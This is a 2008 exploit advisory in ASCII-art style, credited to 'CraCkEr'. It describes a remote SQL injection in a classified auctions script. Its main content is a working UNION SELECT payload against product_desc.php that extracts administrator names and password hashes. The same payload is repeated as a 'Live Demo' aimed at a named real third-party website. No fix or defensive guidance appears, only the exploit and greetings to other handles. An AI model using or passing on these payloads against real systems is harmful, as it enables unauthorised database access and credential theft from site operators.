┌┌────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Remote SQL Injection ] ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : : : │ Group : N/A │ │ │ │ Script : Classified Auctions Script│ │ Register Globals : │ │ Download : pozscripts.com │ │ │ │ Critical : High [░░▒▒▓▓██] │ │ [█] ON [ ] OFF │ │ │ │ │ │ ─────────────────────────────────────┘ └─────────────────────────────────── │ │ DALnet #crackers ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ [SQL] www.localhost/product_desc.php?id=-1 UNION SELECT 1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 FROM savoirs_militaria.freetplauctions_admin-- Live Demo: http://bourses-aux-armes.com/product_desc.php?id=-1 UNION SELECT 1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 FROM savoirs_militaria.freetplauctions_admin-- └─────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X . ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2008 ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘